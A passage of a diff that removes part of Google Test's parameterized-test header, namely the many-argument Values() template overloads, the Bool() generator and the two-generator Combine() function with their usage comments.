-      v20, v21, v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33,
-      v34, v35, v36);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37>
-internal::ValueArray37<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37> Values(T1 v1, T2 v2, T3 v3,
-    T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28,
-    T29 v29, T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36,
-    T37 v37) {
-  return internal::ValueArray37<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37>(v1, v2, v3,
-      v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19,
-      v20, v21, v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33,
-      v34, v35, v36, v37);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38>
-internal::ValueArray38<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28,
-    T29 v29, T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36,
-    T37 v37, T38 v38) {
-  return internal::ValueArray38<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38>(v1, v2,
-      v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18,
-      v19, v20, v21, v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32,
-      v33, v34, v35, v36, v37, v38);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39>
-internal::ValueArray39<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28,
-    T29 v29, T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36,
-    T37 v37, T38 v38, T39 v39) {
-  return internal::ValueArray39<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39>(v1,
-      v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17,
-      v18, v19, v20, v21, v22, v23, v24, v25, v26, v27, v28, v29, v30, v31,
-      v32, v33, v34, v35, v36, v37, v38, v39);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40>
-internal::ValueArray40<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40> Values(T1 v1,
-    T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11,
-    T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19,
-    T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27,
-    T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35,
-    T36 v36, T37 v37, T38 v38, T39 v39, T40 v40) {
-  return internal::ValueArray40<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15,
-      v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, v27, v28, v29,
-      v30, v31, v32, v33, v34, v35, v36, v37, v38, v39, v40);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41>
-internal::ValueArray41<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-    T41> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-    T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41) {
-  return internal::ValueArray41<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14,
-      v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, v27, v28,
-      v29, v30, v31, v32, v33, v34, v35, v36, v37, v38, v39, v40, v41);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42>
-internal::ValueArray42<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-    T42> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-    T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-    T42 v42) {
-  return internal::ValueArray42<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13,
-      v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, v27,
-      v28, v29, v30, v31, v32, v33, v34, v35, v36, v37, v38, v39, v40, v41,
-      v42);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43>
-internal::ValueArray43<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-    T43> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-    T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-    T42 v42, T43 v43) {
-  return internal::ValueArray43<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12,
-      v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26,
-      v27, v28, v29, v30, v31, v32, v33, v34, v35, v36, v37, v38, v39, v40,
-      v41, v42, v43);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44>
-internal::ValueArray44<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32, T33 v33,
-    T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40, T41 v41,
-    T42 v42, T43 v43, T44 v44) {
-  return internal::ValueArray44<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11,
-      v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25,
-      v26, v27, v28, v29, v30, v31, v32, v33, v34, v35, v36, v37, v38, v39,
-      v40, v41, v42, v43, v44);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45>
-internal::ValueArray45<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8,
-    T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16,
-    T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24,
-    T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31, T32 v32,
-    T33 v33, T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39, T40 v40,
-    T41 v41, T42 v42, T43 v43, T44 v44, T45 v45) {
-  return internal::ValueArray45<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10,
-      v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24,
-      v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35, v36, v37, v38,
-      v39, v40, v41, v42, v43, v44, v45);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46>
-internal::ValueArray46<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31,
-    T32 v32, T33 v33, T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39,
-    T40 v40, T41 v41, T42 v42, T43 v43, T44 v44, T45 v45, T46 v46) {
-  return internal::ValueArray46<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45, T46>(v1, v2, v3, v4, v5, v6, v7, v8, v9,
-      v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23,
-      v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35, v36, v37,
-      v38, v39, v40, v41, v42, v43, v44, v45, v46);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47>
-internal::ValueArray47<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46, T47> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31,
-    T32 v32, T33 v33, T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39,
-    T40 v40, T41 v41, T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47) {
-  return internal::ValueArray47<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45, T46, T47>(v1, v2, v3, v4, v5, v6, v7, v8,
-      v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23,
-      v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35, v36, v37,
-      v38, v39, v40, v41, v42, v43, v44, v45, v46, v47);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48>
-internal::ValueArray48<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46, T47, T48> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6,
-    T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31,
-    T32 v32, T33 v33, T34 v34, T35 v35, T36 v36, T37 v37, T38 v38, T39 v39,
-    T40 v40, T41 v41, T42 v42, T43 v43, T44 v44, T45 v45, T46 v46, T47 v47,
-    T48 v48) {
-  return internal::ValueArray48<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45, T46, T47, T48>(v1, v2, v3, v4, v5, v6, v7,
-      v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22,
-      v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35, v36,
-      v37, v38, v39, v40, v41, v42, v43, v44, v45, v46, v47, v48);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49>
-internal::ValueArray49<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46, T47, T48, T49> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5,
-    T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14,
-    T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22,
-    T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30,
-    T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36, T37 v37, T38 v38,
-    T39 v39, T40 v40, T41 v41, T42 v42, T43 v43, T44 v44, T45 v45, T46 v46,
-    T47 v47, T48 v48, T49 v49) {
-  return internal::ValueArray49<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45, T46, T47, T48, T49>(v1, v2, v3, v4, v5, v6,
-      v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21,
-      v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35,
-      v36, v37, v38, v39, v40, v41, v42, v43, v44, v45, v46, v47, v48, v49);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49, typename T50>
-internal::ValueArray50<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    T44, T45, T46, T47, T48, T49, T50> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13,
-    T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21,
-    T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29,
-    T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36, T37 v37,
-    T38 v38, T39 v39, T40 v40, T41 v41, T42 v42, T43 v43, T44 v44, T45 v45,
-    T46 v46, T47 v47, T48 v48, T49 v49, T50 v50) {
-  return internal::ValueArray50<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40, T41, T42, T43, T44, T45, T46, T47, T48, T49, T50>(v1, v2, v3, v4,
-      v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19,
-      v20, v21, v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33,
-      v34, v35, v36, v37, v38, v39, v40, v41, v42, v43, v44, v45, v46, v47,
-      v48, v49, v50);
-}
-
-// Bool() allows generating tests with parameters in a set of (false, true).
-//
-// Synopsis:
-// Bool()
-//   - returns a generator producing sequences with elements {false, true}.
-//
-// It is useful when testing code that depends on Boolean flags. Combinations
-// of multiple flags can be tested when several Bool()'s are combined using
-// Combine() function.
-//
-// In the following example all tests in the test case FlagDependentTest
-// will be instantiated twice with parameters false and true.
-//
-// class FlagDependentTest : public testing::TestWithParam<bool> {
-//   virtual void SetUp() {
-//     external_flag = GetParam();
-//   }
-// }
-// INSTANTIATE_TEST_CASE_P(BoolSequence, FlagDependentTest, Bool());
-//
-inline internal::ParamGenerator<bool> Bool() {
-  return Values(false, true);
-}
-
-# if GTEST_HAS_COMBINE
-// Combine() allows the user to combine two or more sequences to produce
-// values of a Cartesian product of those sequences' elements.
-//
-// Synopsis:
-// Combine(gen1, gen2, ..., genN)
-//   - returns a generator producing sequences with elements coming from
-//     the Cartesian product of elements from the sequences generated by
-//     gen1, gen2, ..., genN. The sequence elements will have a type of
-//     tuple<T1, T2, ..., TN> where T1, T2, ..., TN are the types
-//     of elements from sequences produces by gen1, gen2, ..., genN.
-//
-// Combine can have up to 10 arguments. This number is currently limited
-// by the maximum number of elements in the tuple implementation used by Google
-// Test.
-//
-// Example:
-//
-// This will instantiate tests in test case AnimalTest each one with
-// the parameter values tuple("cat", BLACK), tuple("cat", WHITE),
-// tuple("dog", BLACK), and tuple("dog", WHITE):
-//
-// enum Color { BLACK, GRAY, WHITE };
-// class AnimalTest
-//     : public testing::TestWithParam<tuple<const char*, Color> > {...};
-//
-// TEST_P(AnimalTest, AnimalLooksNice) {...}
-//
-// INSTANTIATE_TEST_CASE_P(AnimalVariations, AnimalTest,
-//                         Combine(Values("cat", "dog"),
-//                                 Values(BLACK, WHITE)));
-//
-// This will instantiate tests in FlagDependentTest with all variations of two
-// Boolean flags:
-//
-// class FlagDependentTest
-//     : public testing::TestWithParam<tuple<bool, bool> > {
-//   virtual void SetUp() {
-//     // Assigns external_flag_1 and external_flag_2 values from the tuple.
-//     tie(external_flag_1, external_flag_2) = GetParam();
-//   }
-// };
-//
-// TEST_P(FlagDependentTest, TestFeature1) {
-//   // Test your code using external_flag_1 and external_flag_2 here.
-// }
-// INSTANTIATE_TEST_CASE_P(TwoBoolSequence, FlagDependentTest,
-//                         Combine(Bool(), Bool()));
-//
-template <typename Generator1, typename Generator2>
-internal::CartesianProductHolder2<Generator1, Generator2> Combine(
-    const Generator1& g1, const Generator2& g2) {
-  return internal::CartesianProductHolder2<Generator1, Generator2>(
-      g1, g2);
-}
-
